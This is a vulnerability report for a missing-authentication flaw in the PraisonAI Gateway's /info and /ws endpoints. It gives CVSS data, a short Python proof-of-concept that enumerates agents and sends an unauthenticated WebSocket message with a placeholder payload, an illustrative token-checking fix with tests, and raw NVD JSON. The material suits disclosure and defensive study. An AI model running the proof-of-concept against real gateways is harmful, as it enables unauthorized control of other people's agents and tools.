Security Vulnerability Report
CVE-2026-34952 CVSS 9.1 CRITICAL

CVE-2026-34952

Published: 2026-04-03 23:17:06
Last Modified: 2026-04-09 16:55:59

Description

PraisonAI is a multi-agent teams system. Prior to version 4.5.97, the PraisonAI Gateway server accepts WebSocket connections at /ws and serves agent topology at /info with no authentication. Any network client can connect, enumerate registered agents, and send arbitrary messages to agents and their tool sets. This issue has been patched in version 4.5.97.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Weakness
CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 4.5.97

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import asyncio
import json

import requests
import websockets

TARGET_URL = "http://target-server"
WS_URL = "ws://target-server/ws"

# 1. Enumerate agents via /info. No Authorization header is sent: on an
#    unpatched gateway (< 4.5.97) the topology comes back anyway.
print("[*] Fetching agent topology...")
try:
    r = requests.get(f"{TARGET_URL}/info", timeout=10)
    if r.status_code == 200:
        agents = r.json()
        print(f"[+] Found agents: {agents}")
except Exception as e:
    print(f"[-] Error fetching info: {e}")


# 2. Connect to /ws without credentials and send an arbitrary message.
async def send_exploit():
    async with websockets.connect(WS_URL) as websocket:
        # Placeholder payload: the advisory does not document the message
        # schema, so these keys are illustrative, not the real protocol.
        payload = {
            "agent": "target-agent-id",
            "message": "Arbitrary malicious command",
        }
        print(f"[*] Sending payload: {payload}")
        await websocket.send(json.dumps(payload))
        response = await websocket.recv()
        print(f"[+] Received response: {response}")


asyncio.run(send_exploit())
```
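
The fix side, as an added example that is not PraisonAI's own code: a minimal ASGI gateway in which one bearer-token check gates both the HTTP /info route and the /ws WebSocket handshake (closing before accept, so an unauthenticated client never gets to send agent messages), together with a version check against the 4.5.97 cutoff from the affected-products section. Only the two paths and the cutoff version come from the advisory; the ASGI layout, the GATEWAY_TOKEN environment variable, the sample agent registry and the message schema are assumptions made for illustration.

```python
"""Added example (not PraisonAI code): bearer-token gating for /info and /ws.

Only the two paths and the 4.5.97 cutoff come from the advisory; the ASGI
layout, token source, agent registry and message schema are assumptions.
"""
import asyncio
import hmac
import json
import os
import re

GATEWAY_TOKEN = os.environ.get("GATEWAY_TOKEN", "example-token-change-me")  # assumed
AGENTS = {"planner": ["web_search"], "coder": ["run_python"]}  # constructed sample
FIXED_VERSION = (4, 5, 97)  # versionEndExcluding from the advisory


def is_vulnerable_version(version):
    """True when a numeric PraisonAI version string sorts below 4.5.97."""
    nums = []
    for part in version.split(".")[:3]:
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    return tuple(nums) < FIXED_VERSION


def bearer_token(scope):
    """Return the token from the scope's Authorization header, or None."""
    for name, value in scope.get("headers", []):
        if name.lower() == b"authorization":
            scheme, _, token = value.decode("latin-1").partition(" ")
            if scheme.lower() == "bearer" and token.strip():
                return token.strip()
    return None


def is_authorized(scope, expected=None):
    """Constant-time token check, shared by the HTTP and WebSocket routes."""
    expected = GATEWAY_TOKEN if expected is None else expected
    token = bearer_token(scope)
    return token is not None and hmac.compare_digest(token.encode(), expected.encode())


async def _send_json(send, status, body):
    await send({"type": "http.response.start", "status": status,
                "headers": [(b"content-type", b"application/json")]})
    await send({"type": "http.response.body", "body": json.dumps(body).encode()})


async def gateway(scope, receive, send):
    """ASGI entry point: the same check gates both routes."""
    if scope["type"] == "http":
        if scope["path"] != "/info":
            await _send_json(send, 404, {"error": "not found"})
        elif not is_authorized(scope):
            # Pre-4.5.97 served the topology here to anyone; answer with no agent names.
            await _send_json(send, 401, {"error": "unauthorized"})
        else:
            await _send_json(send, 200, {"agents": AGENTS})
    elif scope["type"] == "websocket":
        await receive()  # consume websocket.connect
        if scope["path"] != "/ws" or not is_authorized(scope):
            # Close before accept(): the handshake fails and no frame is ever read.
            await send({"type": "websocket.close", "code": 1008})
            return
        await send({"type": "websocket.accept"})
        while True:
            event = await receive()
            if event["type"] != "websocket.receive":
                return  # websocket.disconnect
            try:
                msg = json.loads(event.get("text") or "")
                agent = msg["agent"]
                reply = {"agent": agent, "tools": AGENTS[agent], "echo": msg.get("message")}
            except (ValueError, KeyError, TypeError):
                reply = {"error": "bad request"}
            await send({"type": "websocket.send", "text": json.dumps(reply)})


def make_scope(kind, path, token=None):
    """Minimal ASGI scope for a test client; token=None means unauthenticated."""
    headers = [(b"host", b"gateway.example")]
    if token is not None:
        headers.append((b"authorization", f"Bearer {token}".encode()))
    scope = {"type": kind, "path": path, "headers": headers}
    if kind == "http":
        scope["method"] = "GET"
    return scope


def simulate(scope, incoming=()):
    """Drive the app in memory and return every event it sent."""
    queue, sent = list(incoming), []

    async def receive():
        return queue.pop(0)

    async def send(event):
        sent.append(event)

    asyncio.run(gateway(scope, receive, send))
    return sent


if __name__ == "__main__":
    print("anonymous GET /info ->", simulate(make_scope("http", "/info"))[0]["status"])
    ws = simulate(make_scope("websocket", "/ws"), [{"type": "websocket.connect"}])
    print("anonymous /ws handshake ->", ws[0]["type"])
    print("4.5.96 vulnerable ->", is_vulnerable_version("4.5.96"))
```

Run the file directly to see the in-memory checks, or serve the callable with any ASGI server (for example `uvicorn module:gateway`) and point the PoC above at it: the /info request gets 401 with no agent names, and the /ws connect fails during the handshake instead of being accepted. The design point is that the WebSocket path is rejected before accept, so the token check cannot be bypassed by opening the socket first and sending a message.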

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34952",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-03T23:17:06.490",
    "lastModified": "2026-04-09T16:55:59.233",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.97, the PraisonAI Gateway server accepts WebSocket connections at /ws and serves agent topology at /info with no authentication. Any network client can connect, enumerate registered agents, and send arbitrary messages to agents and their tool sets. This issue has been patched in version 4.5.97."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.5.97",
                "matchCriteriaId": "7525B4ED-CECC-4805-8EED-C055561A15F0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```